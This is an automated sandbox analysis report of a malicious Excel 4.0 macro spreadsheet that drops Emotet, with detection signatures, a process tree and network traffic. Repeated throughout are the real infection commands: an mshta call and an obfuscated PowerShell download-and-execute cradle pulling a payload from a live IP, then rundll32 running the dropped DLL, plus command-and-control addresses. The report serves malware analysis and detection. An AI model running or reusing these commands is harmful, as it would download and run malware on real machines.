Windows Analysis Report
imedpub_6.xls

Overview

General Information

Sample Name: imedpub_6.xls
Analysis ID: 562403
MD5: eee4085b8c00a4dbae2459b0f97ebeb7
SHA1: c449b3584ff6db4b37c402aa27ed8b6793b5bd74
SHA256: b164d04bb1b4cd3d543360e74d6bc1407a85aabb63ea43b31deacbc02f72840a
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1944 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2676 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 1996 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2952 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2624 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 1792 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1164 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1988 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1208 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 196 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
Source | Rule | Description | Author | Strings
imedpub_6.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
imedpub_6.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\imedpub_6.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\imedpub_6.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
C:\ProgramData\JooSee.dll | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
13.2.rundll32.exe.3b0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
13.2.rundll32.exe.620000.2.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
13.2.rundll32.exe.27b0000.8.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
15.2.rundll32.exe.2630000.12.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
15.2.rundll32.exe.2830000.16.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

System Summary

Source: File created Author: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 1996, TargetFilename: C:\Users\user\AppData\Local
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2576
Source: Process started Author: Florian Roth: Data: Command: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2676, ProcessCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 1996
Source: Process started Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1944, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2676
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2576
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2576
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1996, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2576

AV Detection

Source: 13.2.rundll32.exe.2430000.5.unpack Malware Configuration Extractor: Emotet
Source: imedpub_6.xls ReversingLabs: Detection: 18%
Source: hostfeeling.com Virustotal: Detection: 10%
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
Source: global traffic DNS query: name: hostfeeling.com

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1 Host: 91.240.118.172 Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1 Host: jurnalpjf.lan.go.id Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 20:02:00 GMT Server: Apache/2.4.6 (CentOS) PHP/7.4.27 X-Powered-By: PHP/7.4.27 Set-Cookie: 61f44bb842acf=1643400120; expires=Fri, 28-Jan-2022 20:03:00 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Fri, 28 Jan 2022 20:02:00 GMT Expires: Fri, 28 Jan 2022 20:02:00 GMT Content-Disposition: attachment; filename="uHkwl.dll" Content-Transfer-Encoding: binary Content-Length: 548864 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Ascii: MZ@!L!This program cannot be run in DOS mode.
                            Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.172 Connection: Keep-Alive
                            Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
                            Source: unknown Network traffic detected: IP country count 21
                            Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
                            Source: unknown DNS traffic detected: queries for: hostfeeling.com
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com\<4& equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
